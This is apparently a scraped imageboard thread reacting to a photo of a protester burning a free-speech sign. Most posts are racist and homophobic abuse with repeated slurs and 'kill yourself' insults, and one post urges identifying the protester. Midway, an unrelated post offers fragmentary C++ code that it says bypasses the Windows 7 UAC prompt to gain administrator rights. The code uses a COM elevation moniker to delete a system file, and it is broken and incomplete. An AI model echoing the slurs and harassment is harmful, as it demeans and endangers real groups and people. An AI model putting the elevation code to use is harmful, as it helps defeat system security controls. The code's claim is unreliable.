Wow, this is powerful

Wow, this is powerful.

Other urls found in this thread:

I hope he got arrested, then tried to claim free speech for burning a sign.

Face hidden, doubt it.

wow we all know that the left wants this.... Wowowowowow. Keep posting slide threads and I'll keep sageing

Classic. This needs to be immortalized in history courses to help future generations understand why the left became so fucking despised at this point in time.

Even better in context.

Who the fuck does this nigger think will be controlling unprotected speech? Him and his art school buttbuddies? No. Lockheed Martin. Halliburton. Northropp. Hell, maybe even Wal-Mart. Money and power will determine what speech is permitted, and none of these fags have anywhere near enough to make an impact.

I'm sure it wouldn't be hard to single out someone with white shirt or brown pants.

this is a classic shill tacti and all the leddit fags itt are falling for it.. Free speech is what allows the spread of fake news, socialism and race-mixing. The only freedom of speech we should have is the freedom to praise Donald trump.

Don't forget the arm tatoo

that'ss great

Ok if it isn't obvious that shit is shopped.

And here's the retard who found the evidence but isn't smart enough to put two and two together See? IT'S LITERALLY THE EXACT SAME SIGN FROM 50 YEARS AGO THAT HE BURNED. LOGIC AMIRIGHT? LOLOLOLELELELELELFUCK YOU ALLLLLLLLLLLLLL

speech should on be 'free' if it does NOT [further] rot the brains of the masses

>T ® U T H F U L
>H Y P E ® B O L E

The fact that there are more photographers than protesters tells me that their motives are disingenuous.

Kill yourself moron

Kill yourself moron

>Using tumblr memes
I didn't want to catch cancer today

Has somebody identified this turd yet?

Wow I hate democrats now


Execute any function with administrative privileges on Windows 7, while bypassing the UAC permission window, which generally asks permission before executing with administrative privileges


HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
WCHAR wszMon[300];

StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);

void ElevatedDelete()

// This is only availabe on Vista and higher
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);


powerful message coming through

fuck off nigger

You can literally make any thread at your own leisure, there are few worse then fags that go around Sup Forums plastering up their current favorite topic on every thread.

Can you handle this?

Are You Feeling It Now Mr. Krabs?

You know, ... its true.

I'm really starting to hate you cross threading stupid niggers. Stop attention whoring your shit thread and like me shitpost in peace.

Take it from the seven-time Weight Watchers success story